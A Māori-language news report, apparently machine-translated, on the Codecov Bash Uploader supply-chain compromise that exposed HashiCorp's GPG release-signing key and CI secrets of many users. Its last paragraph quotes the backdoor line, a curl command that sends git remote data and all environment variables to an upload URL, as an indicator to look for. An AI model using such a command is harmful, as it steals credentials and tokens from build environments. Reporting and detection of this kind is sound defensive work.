Ko te whakaurunga o te waehere kino ki roto i te tuhinga Codecov i taupatupatu ai te taviri HashiCorp PGP.

Ko HashiCorp, e mohiotia ana mo te whakawhanake i nga taputapu puna tuwhera a Vagrant, Packer, Nomad me Terraform, i whakapuaki i te riihi o te taviri GPG tūmataiti i whakamahia hei hanga hainatanga mamati hei manatoko i nga tukunga. Ka taea e nga kaitukino te uru ki te taviri GPG te whakarereke huna ki nga hua HashiCorp ma te manatoko me te waitohu mamati tika. I te wa ano, i kii te kamupene i te wa o te arotake, kaore i kitea nga tohu o nga ngana ki te whakarereke.

I tenei wa, kua whakakorehia te kii GPG kua taupatupatuhia, kua whakauruhia he kii hou hei whakakapi. Ko te raruraru anake i pa ki te manatoko ma te whakamahi i nga konae SHA256SUM me SHA256SUM.sig, a kaore i pa ki te whakatipuranga o nga waitohu mamati mo te Linux DEB me nga kohinga RPM i tukuna mai i releases.hashicorp.com, me nga tikanga whakamana tuku mo te macOS me te Matapihi (AuthentiCode) .

I puta te turuturu na te whakamahinga o te tuhinga Codecov Bash Uploader (codecov-bash) i roto i te hanganga, i hangaia hei tango i nga purongo kapinga mai i nga punaha whakauru tonu. I te wa o te whakaekenga o te kamupene Codecov, i hunahia he kuaha ki roto i te tuhinga kua tohua, na reira i tukuna ai nga kupuhipa me nga taviri whakamunatanga ki te kaimau a te hunga whakaeke.

Ki te hack, ka whai hua nga kaiwhaiwhai i te hapa i te hanga i te ahua Codecov Docker, i taea ai e ratou te tango i nga raraunga uru ki te GCS (Google Cloud Storage), e tika ana ki te whakarereke i te tuhinga Bash Uploader kua tohatohahia mai i te codecov.io paetukutuku. Ko nga huringa i hoki mai i te Hanuere 31, ka noho kore kitea mo nga marama e rua, ka tukuna nga kaiwhaiwhai ki te tango i nga korero kei roto i nga taiao punaha whakauru tonu a nga kaihoko. Ma te whakamahi i te waehere kino kua taapirihia, ka taea e nga kaiwhaiwhai te tiki korero mo te rehitatanga Git kua whakamatauria me nga taurangi taiao katoa, tae atu ki nga tohu, nga taviri whakamunatanga me nga kupuhipa ka tukuna ki nga punaha whakauru tonu hei whakarite i te uru ki te waehere tono, nga whare putunga me nga ratonga penei i te Amazon Web Services me GitHub.

I tua atu i te waea tika, i whakamahia te tuhinga Codecov Bash Uploader hei waahanga o etahi atu kaituku, penei i te Codecov-action (Github), Codecov-circleci-orb me Codecov-bitrise-step, ko o ratou kaiwhakamahi e pa ana ki te raruraru. Ko nga kaiwhakamahi katoa o te codecov-bash me nga hua e pa ana ki te tirotiro i o raatau hanganga, me te whakarereke i nga kupuhipa me nga taviri whakamunatanga. Ka taea e koe te tirotiro i te aroaro o te tatau o muri i roto i te tuhinga ma te noho o te raina curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /upload/v2 || pono

Source: opennet.ru

Tāpiri i te kōrero